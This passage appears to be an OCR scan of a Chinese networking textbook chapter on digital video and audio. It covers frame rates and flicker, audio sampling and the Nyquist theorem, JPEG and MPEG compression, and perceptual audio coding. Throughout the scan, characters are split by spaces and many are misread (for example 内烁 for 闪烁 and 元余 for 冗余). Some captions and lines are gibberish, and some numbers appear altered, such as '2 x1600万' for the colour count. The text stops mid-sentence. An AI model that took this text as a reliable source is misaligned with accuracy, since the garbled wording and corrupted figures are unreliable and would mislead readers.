数字 视频 最 简单 的 表示 方法 是 帧 的 序列 ， 每 一 帧 由 呈 算 形 栅 格 的 图 像 要 
素 即 像素 (pixel) 组 成 。 对 于 彩色 视频 ， 每 一 像素 RGB 三 色 中 的 每 种 颜 
色 用 8 个 二 进 制 位 来 表示 ， 这 样 可 以 表示 2 x1600 万 种 不 同 的 颜色 ， 已 
经 足够 了 。 人 的 眼睛 没有 能 力 区 分 这 么 多 颜色 ， 更 不 用 说 更 多 的 颜色 
To 


要 产生 平滑 的 运动 效果 ， 数 字 视 频 像 模拟 视频 一 样 必须 每 秒 至 少 显 
示 25 帧 。 然 而 ， 由 于 电 质 量 的 计算 机 显示 器 通常 用 存放 在 视频 RAM 中 
的 图 像 每 秒 钟 扫 描 屏 幕 75 次 或 更 多 次 ， 隔 行 扫描 是 不 必要 的 ， 因 此 所 有 
计算 机 显示 器 都 采用 逐 行 扫描 。 仅 仅 连续 刷新 《也 就 是 重 绘 ) 相同 的 帧 
三 次 就 足以 消除 闪烁 。 

















换言之 ， 运 动 的 平滑 性 是 由 每 秒 不 同 的 图 像 数 决定 的 ， 而 内 烁 则 是 
由 每 秒 刷 新 屏幕 的 次 数 决定 的 。 这 两 个 参数 是 不 同 的 。 一 幅 静 止 的 图 像 
以 每 秒 20 帧 的 频率 显示 不 会 表现 出 断断续续 的 运动 ， 但 是 却 会 出 现 内 
烁 ， 因 为 当 一 帧 画面 在 视网膜 上 消退 时 下 一 帧 还 没有 出 现 。 一 部 电影 每 
秒 有 20 个 不 同 的 帧 ， 在 80 Hz 的 刷新 率 下 每 一 帧 将 连续 绘制 4 次 ， 这 样 不 


会 出 现 内 烁 ， 但 是 运动 将 是 断断续续 的 。 








当 我 们 考虑 在 网 络 上 传输 数字 视频 所 需要 的 带宽 时 ， 这 两 个 参数 的 
重要 性 就 十 分 清楚 了 。 目 前 许多 计算 机 显示 器 都 采用 4:3 的 纵横 比 ， 所 
以 可 以 使 用 便宜 的 并 且 大 量 生产 的 显像管 ， 这 样 的 显像管 本 来 是 为 电视 
市 场 的 消费 者 设计 的 。 显 示 器 常用 的 配置 有 640x480 CVGA) 、 
800x600 (SVGA) 、1024x768 (XGA) 以 及 1600x1200 (UXGA) 。 

















像素 24 位 的 UXGA 显 示 以 及 25 帧 / 秒 ， 需 要 1.2Gbps 的 带宽 ， 即 使 VGA 显 
示 也 需要 184Mbps。 将 这 些 速率 加 倍 以 避免 闪烁 是 没有 吸引 力 的， 更 好 
的 解决 方案 是 每 秒 传输 25 帧 ， 同 时 让 计算 机 保存 每 一 帧 并 将 其 绘制 两 
次 。 广 播 方式 的 电视 没有 使 用 这 一 策略 ， 因 为 电视 机 没有 人 存储器， 并且 
模拟 信号 如 果 不 首先 转换 成 数字 形式 无 论 如 何 也 无 法 存放 在 RAM 中 ， 
而 模 数 转换 则 需要 额外 的 硬件 。 因 此 ， 隔 行 扫 描 对 于 广播 方式 的 电视 而 


言 是 需要 的 ， 但 是 对 数字 视频 则 不 需要 。 

















7.2.2 ”音频 编码 


音频 〈 声 音 ) 波 是 一 维 的 声 ( 压 ) 波 。 当 声波 进入 人 耳 的 时 候 ， 鼓 
膜 将 振动 ， 寻 致 内 耳 的 小 骨 随 之 振动 ， 将 神经 脉冲 送 入 大 脑 ， 这 些 脉冲 
被 收听 者 感知 为 声音 。 类 似 地 ， 当 声波 神 击 麦 元 风 的 时 候 ， 考 元 风 将 产 
生 电 信号 ， 将 声音 的 振幅 表示 为 时 间 的 函数 。 








人 耳 可 以 听 到 的 声音 的 频率 范围 从 20 Hz 到 20 000Hz， 而 某 些 动 
物 ， 特 别 是 狗 ， 能 够 听 到 更 高 频率 的 声音 。 耳 条 是 以 对 数 规律 听 声 音 
的 ， 所 以 两 个 振幅 为 A 和 B 的 声音 的 比率 习惯 以 dB (分 贝 ) 为 单位 来 表 


AX, AAN 





dB=20 log, (A/B) 





如 果 我 们 定义 1kHz 正 弦 波 可 听 度 的 下 限 〈 压 力 大 约 为 0.0003 
dyne/em? ) 为 0 dB， 那 么 日 常 谈话 大 约 为 50 dB， 而 使 人 感到 痛苦 的 浆 
值 大 约 为 120 dB， 动 态 范 围 为 一 百 万 量 级 。 为 避免 混淆 ， 上 面 公式 中 的 
A 和 B 是 振幅 。 如 果 我 们 使 用 的 是 功率 水 平 ， 则 上 面 公式 中 对 数 前 面 的 
系数 应 该 为 10， 而 不 是 20， 因 为 功率 与 振幅 的 平方 成 正比 。 














音频 波 可 以 通过 模 数 转换 器 (Analog Digital Converter, ADC) 转 
换 成 数字 形式 。ADC 以 电压 作为 输入 ， 并 且 生 成 二 进 制 数 作 为 输出 。 图 


7-5a 中 为 一 个 正弦 波 的 例子 。 为 了 数字 化 地 表示 该 信号 ， 我 们 可 以 每 隔 
AT 秒 对 其 进行 采样 ， 如 图 7-5b 中 的 条 棱 高 度 所 示 。 如 果 一 个 声波 不 是 纯 
粹 的 正弦 波 ， 而 是 正弦 波 的 线性 县 加 ， 其 中 存在 的 最 高 频率 成 分 为 f， 
那么 以 2{ 的 频率 进行 采样 就 足够 了 。1924 年 贝尔 实验 室 的 一 位 物理 学 家 
Harry Nyquist 从 数学 上 证 明了 这 一 结果 ， 这 就 是 著名 的 Nyquist 抽 样 定 
理 。 更 多 地 进行 采样 是 没有 价值 的 ， 因 为 如 此 采样 可 以 检测 到 的 更 高 的 
频率 并 不 存在 。 











a) c) 


图 7-5 DER; b) MILF IRBEAT RAE; 对 样本 进行 4 位 量化 


数字 样本 是 不 准确 的 。 图 7-5c 中 的 样本 只 允许 9 个 值 ， 从 -1.00 到 
1.00， 步 长 为 0.25， 因 此 ， 需 要 4 个 二 进 制 位 来 表示 它们 。8 位 样本 可 以 
有 256 个 不 同 的 值 ，16 位 样本 可 以 有 65 536 个 不 同 的 值 。 由 于 每 一 样本 
的 位 数 有 限 而 引入 的 误差 称 为 量化 噪声 (quantization noise) 。 如 果 量 
化 噪声 太 大 ， 耳 条 就 会 感觉 到 。 





对 声音 进行 采样 的 两 个 著名 的 例子 是 电话 和 音频 CD。 电 话 系统 使 


用 的 是 脉冲 编码 调制 Cpulse code modulation) ， 脉 冲 编码 调制 每 秒 以 7 
位 《北美 和 日 本 ) 或 8 位 《欧洲 ) 对 声音 采样 8000 次 ， 故 这 一 系统 的 数 
据 率 为 56 000 bps 或 64 000 bps。 由 于 每 秒 只 有 8000 个 样本 ， 所 以 4 kHz 以 
上 的 频率 就 丢失 了 。 


音频 CD 是 以 每 秒 44 100 个 样本 的 采样 率 进 行 数字 化 的 ， 足 以 捕获 最 
高 达到 22 050 Hz 的 频率 ， 这 对 于 人 而 言 是 很 好 的 ， 但 是 对 于 狗 而 言 却 是 
很 差 的 。 每 一 样本 在 其 振幅 范围 内 以 16 位 进行 线性 量化 。 注 意 ，16 位 样 
本 只 有 65 536 个 不 同 的 值 ， 而 人 耳 以 最 小 可 听 度 为 步 长 进行 测量 时 的 动 
态 范 围 大 约 为 一 百 万 。 所 以 每 个 样本 只 有 16 位 引入 了 某 些 量化 噪声 ( 尽 
管 没 有 履 盖 全 部 动态 范围 ， 但 是 人 们 并 不 认为 CD 的 质量 受到 损害 ) 。 
以 每 秒 44 100 个 样本 、 每 个 样本 16 位 计算 ， 音 频 CD 需 要 的 带宽 单 声 道 为 
705.6 Kbps， 立 体 声 为 1.411 Mbps (参见 图 7-2) 。 音 频 压 缩 也 许 要 以 描 
述 人 类 听觉 如 何 工作 的 心理 声学 模型 为 基础 。 使 用 MPEG 第 3 层 
(MP3) 系统 进行 10 倍 的 压缩 是 可 能 的 。 采 用 这 一 格式 的 便携 式 音乐 播 
放 器 近年 来 已 经 十 分 普遍 。 














数字 化 的 声音 可 以 十 分 容易 地 在 计算 机 上 用 软件 进行 处 理 。 有 许 许 
多 多 的 个 人 计算 机 程序 可 以 让 用 户 从 多 个 信号 源 记 录 、 显 示 、 编 辑 、 混 
合 和 存储 声波 。 事 实 上 ， 上 所 有 专业 的 声音 记录 与 编辑 系统 如 今 都 是 数字 
化 的 。 模 拟 方式 基本 上 过 时 了 。 














7.3 ”视频 压缩 


现在 我 们 已 经 十 分 清楚 ， 以 非 压 缩 格 式 处 理 多 媒体 信息 是 完全 不 可 
能 的 一 一 它 的 数据 量 太 大 了 ， 惟 一 的 希望 是 有 可 能 进行 大 比例 的 数据 压 
缩 。 笠 运 的 是 ， 在 过 去 几 十 年 ， 大 量 的 研究 群体 已 经 发 明了 许多 压缩 技 
术 和 算法 ， 使 多 媒体 传输 成 为 可 能 。 在 下 面 几 节 中 ， 我 们 将 研究 一 些 多 
媒体 数据 《特别 是 图 像 ) 的 压缩 方法 ， 更 多 的 细节 请 参见 
(Fluckiger,1995; Steinmetz 和 Nahrstedt,1995) 。 





所 有 的 压缩 系统 都 需要 两 个 算法 : 一 个 用 于 在 源 端 对 数据 进行 压 
缩 ， 另 一 个 用 于 在 目的 端 对 数据 进行 解压 缩 。 在 文献 中 ， 这 两 个 算法 分 
列 被 称 为 编码 Cencoding) 算法 和 解码 (decoding) 算法 ， 我 们 在 本 书 
中 也 使 用 这 样 的 术语 。 





这 些 算法 具有 茶 些 不 对 称 性 ， 这 一 不 对 称 性 对 于 理解 数据 压缩 是 十 
分 重要 的 。 首 先 ， 对 于 许多 应 用 而 言 ， 一 个 多 媒体 文档 《比如 说 一 部 电 
影 ) 只 需要 编码 一 次 〈“ 当 该 文档 存储 在 多 媒体 服务 器 上 时 ) ， 但 是 需要 
解码 数 千 次 《〈 当 该 文档 被 客户 观看 时 ) 。 这 一 不 对 称 性 意味 着 ， 假 若 角 
码 算法 速度 快 并 且 不 需要 吊 贯 的 人 硬件， 那么 编码 算法 速度 慢 并 且 需 要 
贵 的 人 硬件 也 是 可 以 接受 的 。 从 男 一 方面 来 说 ， 对 于 诸如 视频 会 议 这 样 的 
实时 多 媒体 而 言 ， 编 码 速度 慢 是 不 可 接受 的 ， 在 这 样 的 场合 ， 编 码 必须 
即时 完成 。 
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第 二 个 不 对 称 性 是 编码 /解码 过 程 不 必 是 100% 可 逆 的 。 也 就 是 说 ， 
当 对 一 个 文件 进行 压缩 并 进行 传输 ， 然 后 对 其 进行 解压 缩 时 ， 用 户 可 以 
期 望 取 回 原始 的 文件 ， 准 确 到 最 后 一 位 。 对 于 多 媒体 ， 这 样 的 要 求 是 不 
存在 的 。 视 频 信号 经 过 编码 和 解码 之 后 与 原始 信号 只 存在 轻微 的 差异 通 
常 就 是 可 以 接受 的 。 当 解码 输出 不 与 原始 输入 严格 相等 时 ， 系 统 被 称 为 
EAH Cossy) 。 所 有 用 于 多 媒体 的 压缩 系统 都 是 有 损 的 ， 因 为 这 样 
可 以 获得 更 好 的 压缩 效果 。 





7.3.1 JPEG 标 准 


用 于 压缩 连续 色调 静止 图 像 〈 例 如 照片 ) 的 JPEG (Joint 
Photographic Experts Group, 联合 摄影 专家 组 ) 标准 是 由 摄影 专家 在 
ITU、ISO 和 IEC 等 其 他 标准 组 织 的 支持 下 开发 出 来 的 。JPEG 标 准 对 于 多 
媒体 而 言 是 十 分 重要 的 ， 因 为 用 于 压缩 运动 图 像 的 标准 MPEG 不 过 是 分 
别 对 每 一 帧 进行 JPEG 编 码 ， 再 加 上 某 些 帧 间 压 缩 和 运动 补偿 等 额外 的 
特征 。JPEG 定 义 在 10918 号 国际 标准 中 。 它 具有 4 种 模式 和 许多 选项 ， 
但 是 我 们 在 这 里 只 关心 用 于 24 位 RGB 视频 的 方法 ， 并 且 省 略 了 许多 细 


二 


Tiy 


用 JPEG 对 一 幅 图 像 进行 编码 的 第 一 步 是 块 预制 。 为 明确 起 见 ， 我 
们 假设 JPEG 输 入 是 一 幅 640x480 的 RGB 图 像 ， 每 个 像素 24 位 ， 如 图 7-6a 
所 示 。 由 于 使 用 亮度 和 色 度 可 以 获得 更 好 的 压缩 效果 ， 所 以 从 RGB 值 中 





计算 出 一 个 亮度 信号 和 两 个 色 度 信号 ， 对 于 NTSC 制 式 ， 分 别 将 其 记 作 
Y、I 和 Q， 对 于 PAL 制 式 ， 分 别 将 其 记 作 Y、U 和 V， 两 种 制式 的 计算 公 
式 是 不 同 的 。 下 面 我 们 将 使 用 NTSC 的 符号 ， 但 是 压缩 算法 是 相同 的 。 


对 Y、I 和 Q 构 造 不 同 的 矩阵 ， 每 个 矩阵 其 元 素 的 取 值 范围 在 0 到 255 
之 间 。 接 下 来 ， 在 I 和 Q 和 矩阵 中 对 由 4 个 元 素 组 成 的 方块 进行 平均 ， 将 矩 
阵 绾 小 至 320x240。 这 一 缩小 是 有 损 的 ， 但 是 眼睛 几乎 注意 不 到 ， 因 为 
眼睛 对 亮度 比 对 色 度 更 加 敏感 ， 然 而 这 样 做 的 结果 是 将 数据 压缩 了 2 
倍 。 现 在 将 所 有 三 个 矩阵 的 每 个 元 素 减 去 128， 从 而 将 0 置 于 取 值 范围 的 
中 间 。 最 后 将 每 个 矩阵 划分 成 8x8 的 块 ，Y 和 矩阵 有 4800 块 ， 其 他 两 个 矩 
阵 每 个 有 1200 块 ， 如 图 7-6b 所 示 。 
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a) b) 


图 7-6 anRGB 输 入 数据 ; b) 块 预制 之 后 


JPEG 的 第 2 步 是 分 别 对 7200 块 中 的 每 一 块 应 用 DCT (LAR KE 


换 ) 。 每 一 DCT 的 输出 是 一 个 8x8 的 DCT 系 数 和 矩阵 。DCIT 和 矩阵 的 〈0,0) 
元 素 是 块 的 平均 值 ， 其 他 元 素 表 明 每 一 空间 频率 存在 多 大 的 谱 功 率 。 对 
于 熟悉 傅立叶 变换 的 读者 而 言 ，DCT 则 是 一 种 二 维 的 空间 傅立叶 变换 。 
在 理论 上 ，DCT 是 无 损 的 ， 但 是 在 实践 中 由 于 使 用 浮 点 数 和 超越 函数 总 
要 引入 某 些 舍 入 误差 ， 从 而 导致 轻微 的 信息 损失 。 通 常 这 些 元 素 随 着 到 
(0,0) 元素 距 离 的 增加 而 迅速 衰减 ， 如 图 7-7b 所 示 。 
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图 7-7 a)YERM—3#; bjDCT 系 数 


DCT 完 成 之 后 ，JPEG 进 入 到 第 3 步 ， 称 为 量化 (quantization) ， 在 
量化 过 程 中 不 重要 的 DCT 系 数 将 被 去 除 。 这 一 〈 有 损 ) 变换 是 通过 将 
8x8 DCT 和 矩阵 中 的 每 个 元 素 除 以 取 自 一 张 表 中 的 权 值 而 实现 的 。 如 果 所 
有 权 值 都 是 1， 那 么 该 变换 将 不 做 任何 事情 。 然 而 ， 如 果 权 值 随 着 离 原 
点 的 距离 而 急剧 增加 ， 那 么 较 高 的 空间 频率 将 迅速 衰落 。 








图 7-8 给 出 了 这 一 步 的 一 个 例子 ， 在 图 7-8 中 我 们 可 以 看 到 初始 DCT 
甜 阵 、 量 化 表 和 通过 将 每 个 DCT 元 素 除 以 相应 量化 表 元 素 所 获得 的 结 
果 。 量 化 表 中 的 值 不 是 JPEG 标 准 的 一 部 分 。 每 一 应 用 必须 提供 自己 的 
量化 表 ， 这 样 就 给 应 用 以 控制 自身 压缩 损失 权衡 的 能 
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7-8 量化 DCT 系 数 的 计算 


第 4 步 通 过 将 每 一 块 的 〈0,0) 值 〈 左 上 角 元 素 ) 以 它 与 前 一 块 中 相 
应 元 系 相 莽 的 量 玲 换 而 减 小 。 由 于 这 些 元 系 是 各 自 所 在 块 的 平均 ， 它 们 
应 该 变化 得 比较 缓慢 ， 所 以 采用 将 值 可 以 将 这 些 元 素 中 的 大 部 分 缩减 为 
较 小 的 值 。 对 于 其 他 元 聚 不 计算 兰 值 。〈0,0) 值 称 为 DC 分 量 ， 其 他 值 


称 为 AC 分 量 。 





第 5 步 是 将 64 个 元 素 线性 化 并 且 对 线性 化 得 到 的 列表 进行 行程 长 度 
编码 。 从 左 到 右 然后 从 上 到 下 地 对 块 进行 扫描 不 能 将 零 集中 在 一 起 ， 所 
以 采用 了 Z 字 形 的 扫描 模式 ， 如 图 7-9 所 示 。 在 本 例 中 ，Z 字 形 模式 最 终 
在 矩阵 的 尾部 产生 了 38 个 连续 的 0， 这 一 串 0 可 以 缩减 为 一 个 计数 表明 有 
38 个 0。 
































图 7-9 量化 值 传 送 的 顺序 








现在 我 们 得 到 一 个 代表 图 像 的 数字 列表 在 变换 空间 中 ) ， 第 6 步 
将 采用 Huffman 编 码 对 列表 中 的 数字 进行 编码 以 用 于 存储 或 传输 。 


JPEG 看 来 似乎 十 分 复杂 ， 这 是 因为 它 确实 很 复杂 。 尽 管 如 此 ， 由 
于 它 通 常 可 以 获得 20:1 或 更 好 的 压缩 效果 ， 所 以 获得 广泛 的 应 用 。 解 码 
一 幅 JPEG 图 像 需 要 反 过 来 运行 上 述 算法 。JPEG 大 体 上 是 对 称 的 : 解码 
一 幅 图 像 花 费 的 时 间 与 编码 基本 相同 。 











7.3.2 MPEG 标准 


最 后 ， 我 们 讨论 问题 的 核心 : MPEG (Motion Picture Experts 
Group， 运 动 图 像 专家 组 ) 标准 。 这 是 用 于 压缩 视频 的 主要 算法 ， 并 于 
1993 年 成 为 国际 标准 。MPEG-1 (第 11172 号 国际 标准 ) 设计 用 于 视频 录 
像 机 质量 的 输出 〈 对 NTSC 制 式 为 352x240) ， 它 使 用 的 位 率 为 1.2 
Mbps。MPEG-2《〈 第 13818 号 国际 标准 ) 设计 用 于 将 广播 质量 的 视频 压 
缩 至 4 Mbps 到 6 Mbps， 这 样 就 可 以 适应 NTSC 或 PAL 和 制式 的 广播 频道 。 








MPEG 的 两 个 版 本 均 利用 了 在 电影 中 存在 的 两 类 多余 : 空间 元 余 和 
时 间 元 余 。 空 间 元 余 可 以 通过 简单 地 用 JPEG 分 别 对 每 一 帧 进行 编码 而 
得 到 利用 。 互 相连 续 的 帧 常常 几乎 是 完全 相同 的 ， 这 就 是 时 间 元 余 ， 利 
用 这 一 事实 可 以 达到 额外 的 压缩 效果 。 数 字 便 携 式 摄像 机 使 用 的 数字 视 
频 (Digital Video, DV) 系统 只 使 用 类 JPEG 的 方案 ， 这 是 因为 只 单独 对 
每 一 帧 进行 编码 可 以 达到 更 快 的 速度 ， 从 而 使 编码 可 以 实时 完成 。 这 一 
论断 的 因果 关系 可 以 从 图 7-2 看 出 : 尽管 数字 便携 式 摄像 机 与 未 压缩 电 
视 相 比 具 有 较 低 的 数据 率 ， 但 是 却 远 不 及 MPEG-2。 (为 了 使 比较 公 
平 ， 请 注意 DV 便携 式 摄像 机 以 8 位 对 亮度 、 以 2 位 对 每 一 色 度 进 行 采 
样 ， 使 用 类 JPEG 编 码 仍然 存在 5 倍 的 压缩 率 。 ) 





对 于 摄像 机 和 背景 绝对 静止 ， 而 有 一 两 个 演员 在 四 周 缓慢 移动 的 场 


景 而 言 ， 帧 与 帧 之 间 几 乎 所 有 的 像素 都 是 相同 的 。 此 时 ， 仅 仅 将 每 一 帧 
减 去 前 一 帧 并 且 在 差 值 图 像 上 运行 JPEG 就 相当 不 错 。 然 而 ， 对 于 摇动 
或 缩放 摄像 机 镜头 的 场景 而 言 ， 这 一 技术 将 变 得 非常 糟糕 。 此 时 需要 某 
种 方法 对 这 一 运动 进行 补偿 ， 这 正 是 MPEG 要 做 的 事情 ; 实际 上 ， 这 就 
是 MPEG 和 JPEG 之 间 的 主要 差别 。 





MPEG-2 输 出 由 三 种 不 同 的 帧 组 成 ， 观 看 程序 必须 对 它们 进行 处 


DI 帧 ， 自 包含 的 JPEG 编 码 静 止 图 像 。 
2)P 帧 ， 与 上 一 帧 逐 块 的 差 。 
3)B 帧 ,与 上 一 帧 和 下 一 帧 的 差 。 


I 帧 只 是 用 JPEG 编 码 的 静止 图 像 ， 沿 肴 每 一 轴 还 使 用 了 全 分 辩 率 的 
亮度 和 半分 辨 率 的 色 度 。 在 输出 流 中 使 I 帧 周期 性 地 出 现 是 十 分 必要 
的 ， 其 原因 有 三 。 首 先 ，MPEG 可 以 用 于 电视 广播 ， 而 观众 收看 是 随意 
的 。 如 果 所 有 的 帧 都 依赖 于 其 前 驱 直 到 第 一 帧 ， 那 么 错过 了 第 一 帧 的 人 
就 再 也 无 法 对 随后 的 帧 进行 解码 ， 这 样 使 观众 在 电影 开始 之 后 就 不 能 
进行 收看 。 第 二 ， 如 果 任 何 一 帧 在 接收 时 出 现 错误 ， 那 么 进一步 的 解码 
束 不 可 能 再 进行 。 第 三 ， 没 有 I 帧 ， 在 进行 快 进 或 倒 带 时， 解码 器 将 不 
得 不 计算 经 过 的 每 一 帧 ， 只 有 这 样 才能 知道 快 进 或 倒 带 集 止 时 帧 的 全 部 
值 。 有 了 I 帧 ， 就 可 以 向 前 或 向 后 跳 过 若干 帧 直到 找到 一 个 I 帧 并 从 那里 








开始 观看 。 由 于 上 述 原 因 ，MPEG 每 秒 将 其 插入 到 输出 中 一 次 或 两 次 。 


与 此 相对 照 ，P 帧 是 对 帧 间 差 进行 编码 。P 帧 基于 安 块 
(macroblock) 的 思想 ， 宏 块 履 盖 亮 度 空 间 中 16x16 个 像素 和 色 度 空间 
中 8x8 个 像素 。 通 过 在 前 一 帧 中 搜索 宏 块 或 者 与 其 只 存在 轻微 差异 的 宏 
块 实现 对 一 个 宏 块 的 编码 。 











P 帧 的 用 途 在 图 7-10 所 示 的 例子 中 可 以 看 出 。 在 图 7-10 中 我 们 看 到 
三 个 连续 的 帧 具有 相同 的 缘 景 ， 但 是 在 一 个 人 所 在 的 位 置 上 存在 差 寞 。 
对 于 摄像 机 固定 在 三 脚 名 上 ， 而 演员 在 摄像 机 面前 活动 的 情形 中 ， 这 种 
ave LN. BAR RN AR LAN, (eee AN ZIRE be 
ACFE- RARE m, a SEY ZH ak BT R BZ 
块 。 











图 7-10 三 个 连续 的 视频 帧 





MPEG 标 准 没 有 规定 如 何 搜 索 、 搜 索 多 远 以 及 如 何 计算 一 个 匹配 的 
好 坏 ， 这 些 都 留 给 每 一 具体 的 实现 。 例 如 ， 一 种 实现 可 能 在 前 一 帧 中 的 
当前 位 置 以 及 所 有 在 x 方 向 偏 移 +Ax、 在 y 方 向 偏 移 +Ay 的 位 置 搜索 一 个 

















宏 块 。 对 于 每 个 位 置 ， 可 以 计算 出 亮度 窍 阵 中 匹配 的 数目 。 具 有 了 基 高 得 
分 的 位 置 将 成 为 获胜 着 ， 只 要 其 得 分 高 于 菏 一 了 预 设 的 国 值 。 否 则 ， 宏 块 
就 被 称 为 失 配 。 当 然 ， 更 复杂 的 算法 也 是 可 能 的 。 








如 果 一 个 安 块 被 找到 ， 则 通过 以 其 值 与 前 一 帧 中 的 值 求 差 对 其 进行 
编码 (针对 亮度 和 两 个 色 度 ) ， 然 后 ， 对 这 些 差 值 矩 阵 进行 JPEG 编 
码 。 输 出 流 中 宏 块 的 值 是 运动 矢量 〈 宏 块 在 每 一 方向 从 其 前 一 位 置 移动 
多 远 的 距离 》， 随 后 是 以 JPEG 进 行 编码 的 与 前 一 帧 的 差 值 。 如 果 宏 块 
在 前 一 帧 中 查找 不 到 ， 则 当前 值 以 JPEG 进 行 编码 ， 如 同 在 ! 帧 中 一 样 。 











Bi SPA, 不同 的 是 它 允 许 参考 宏 块 既 可 以 在 前 一 帧 中 ， 

也 可 以 在 后 续 的 帧 中 ， 既 可 以 在 其 中， 也 可 以 在 P 帧 中 。 这 一 额外 的 目 
由 可 以 改进 运动 补偿 ， 并 且 在 物体 从 前 面 (或 后 面 ) 经 过 其 他 物体 时 非 
常 有 用 。 例 如 ， 在 一 场 爸 球 比赛 中 ， 妆 三 又 手 将 球 撕 同 一 又 时 ， 可 能 存 
在 茶 些 帧 其 中 垒球 遮 巩 了 在 背景 中 移动 的 二 爸 手 的 头 部 。 在 下 一 帧 中 ， 
二 垒 手 的 头 部 可 能 在 垒球 的 左面 有 一 部 分 可 见 ， 头 部 的 下 一 个 近似 可 以 
从 爸 球 已 经 通过 了 头 部 的 后 续 的 帧 中 导出 。B 帧 允许 一 个 帧 基于 未 来 的 
帧 。 








要 进行 B 帧 编码 ， 编 码 需 需要 在 内 存 中 同时 保存 三 个 解码 的 帧 : 过 
去 的 一 帜 、 妆 前 的 一 帧 和 未 来 的 一 帧 。 为 了 简化 解码 ， 各 帧 必须 以 依赖 
的 顺序 而 不 是 以 显示 的 顺序 出 现在 MPEG 流 中 。 因 而 ， 当 一 段 视频 通过 
网 络 被 观看 时 ， 即 使 有 完美 的 定时 ， 在 用 户 的 机 器 上 也 需要 进行 缓冲 ， 














对 帧 进行 记录 以 便 正 党 地 显示 。 由 于 这 一 依赖 顺序 和 显示 顺序 间 的 差 
异 ， 试 图 反 回 播放 一 部 电影 而 没有 相当 可 观 的 缓冲 和 复杂 的 算法 是 无 法 
工作 的 。 








有 许多 动作 以 及 快速 驻 切 比如 战争 电影 ， 的 电影 需要 许多 I 型 
帧 。 而 那 种 在 导演 对 准 了 摄像 机 之 后 便 出 去 喝 咖 啡 只 留 下 演员 背 台 词 
《比如 爱情 故事 ) 的 电影 ， 束 可 以 使 用 长 段 的 P 帧 与 B 帧 ， 而 这 两 种 帧 
结构 与 I 帧 相 比 使 用 很 少 的 存储 空间 。 从 磁盘 效率 的 角度 来 看 ， 一 个 运 
营 多 媒体 服务 的 公司 应 该 尝试 得 到 尺 可 能 多 的 女性 消费 群体 。 





7.4 音频 压缩 


就 像 我 们 刚刚 看 到 的 ，CD 品 质 的 音频 需要 一 个 1.411 Mbps 带 宽 的 传 
送 。 很 清楚 ， 在 Internet 的 实际 传送 中 ， 需 要 有 效 的 压缩 。 正 是 因为 这 一 
点 ， 已 经 发 展 起 来 许多 不 同 的 音频 压缩 算法 。 或 许 最 流行 的 算法 是 拥有 
三 个 层 〈 变 体 ) 的 MPEG 音 频 ， 其 中 ，MP3(MPEG 音 频 层 3) 是 功能 最 强 
大 也 是 最 出 名 的 。 在 Internet 上 随处 可 见 大 量 MP3 格 式 的 音乐 ， 它 们 并 非 
都 合法 ， 因 此 引发 了 许多 来 自 艺术 家 与 版 权 拥 有 者 的 案件 。MP3 属 于 
MPEG 视 频 压 缩 标准 里 的 音频 部 分 。 

















音频 压缩 可 以 用 两 种 方法 完成 。 在 波形 编码 技术 中 ， 信 和 号 通过 傅 立 
叶 变 换 (Fourier transform) 变换 成 频率 分 量 。 图 7-11 给 出 一 个 时 间 与 它 
最 初 的 15 个 傅立叶 振幅 的 实例 函数 。 然 后 每 一 个 分 量 的 振幅 用 最 简短 的 
方法 编码 。 目 标 是 在 男 一 并 用 尽 可 能 少 的 二 进 制 位 精确 地 重建 其 波形 。 
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图 7-11 二进制 信号 和 它 的 均 方 根 傅立叶 振幅 ; b)~ oe) MAUR 


信号 








另 一 种 方法 是 感知 编码 ， 这 种 技术 是 在 人 类 听觉 系统 中 寻找 某 种 细 
纹 ， 用 来 对 信号 编码 ， 这 种 信号 听 起 来 与 人 的 正常 收听 相同 ， 尽 管 在 示 
波 器 上 看 起 来 却 大 相 径 庭 。 感 知 编码 是 基于 心理 声学 的 一 一 人 们 如 何 感 
知 声音 的 科学 。MP3 正 是 基于 感知 编码 。 














感知 编码 的 关键 特性 在 于 一 些 声 音 可 以 掩盖 住 其 他 声音 。 想 象 在 一 
个 蜗 暖 夏天 举办 的 现场 二 播 的 长 笛 音 乐 会 ， 突 然则， 附近 的 一 群 工人 打 
开 他 们 的 风 锅 开始 挖掘 街道 。 这 时 没有 人 可 以 再 听 到 合子 的 声音 ， 因 为 
它 已 经 被 风 锁 的 声音 给 掩 兽 了 。 从 传送 角度 看 ， 只 编码 风 锁 的 频段 就 足 
够 / ， 因 为 听众 无 论 如何 都 听 不 到 笛子 的 声音 。 这 种 技术 融 叫 做 频段 屏 
藤 一 一 在 一 个 频段 里 啊 腕 的 声音 掩盖 住 另 一 频段 中 较 邓 和 声音 的 能 
这 种 较 和 柔和 声音 只 有 在 没有 啊 亮 声音 时 才 可 以 听 到 。 事 实 上 ， 即 使 风 锁 
停 直 工作 ， 在 一 个 短 时 间 内 笛子 的 声音 也 很 难 再 被 听 到 ， 因 为 耳 东 在 开 
始 工 作 时 已 经 调 低 了 增益 ， 并 且 需 要 在 一 段 时 间 之 后 才 会 再 次 调 高 增 
荔 。 这 种 效果 称 为 暂时 屏 菩 。 











为 了 使 得 这 些 影响 能 尽量 被 量化 ， 设 想 实验 1。 某 个 人 在 一 间 安 静 
的 屋子 里 戴 着 与 计算 机 声卡 相连 的 耳机 。 计 算 机 产生 最 低 100Hz 但 功率 
逐渐 增加 的 纯正 弦 波 。 这 个 人 被 命令 在 他 /她 听 到 一 个 音调 的 时 候 敲 击 
一 个 键 。 计 算 机 在 记录 当前 功率 级 之 后 ， 以 200Hz、300hz 以 及 其 他 所 有 











不 超过 人 类 听力 极限 的 频率 重复 之 前 的 实验 。 在 把 许多 实验 者 的 实验 平 
均值 计算 出 来 后 ， 一 张 关 于 “需要 多 大 功率 才能 使 人 们 听 到 一 个 音调 ”的 
对 数 -对 数 图 就 展现 出 来 了 ， 如 图 7-12a 所 示 。 图 中 曲线 的 给 出 直接 结 
是 : 人 们 并 没有 必要 对 那些 功率 在 可 听 阔 值 之 下 的 频率 编码 。 例 如 ， 在 
图 7-12a 中 ， 如 果 100Hz 的 功率 是 204B， 那 么 在 输出 上 就 可 以 忽略 掉 ， 而 
且 不 会 感觉 到 声音 质量 的 损失 ， 因 为 在 100Hz 处 20dB 是 低 于 可 听 水 平 


的 。 
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图 7-12 aE ARE Ha TT BAE, b) ARR 


现在 考虑 实验 2。 计 算 机 再 次 运行 实验 1， 但 是 这 次 却 一 有 个 大 约 
150 赫 兹 的 等 幅 正 弦 波 合 加 在 实验 频率 上 。 我 们 及 现 ， 在 150Hz 频 率 附 近 
的 可 听 国 值 上 升 了 ， 如 图 7-12b 所 示 。 

这 一 新 实验 的 结果 表明 : 通过 跟踪 那些 被 附近 频段 能 量 更 强 的 信和 号 


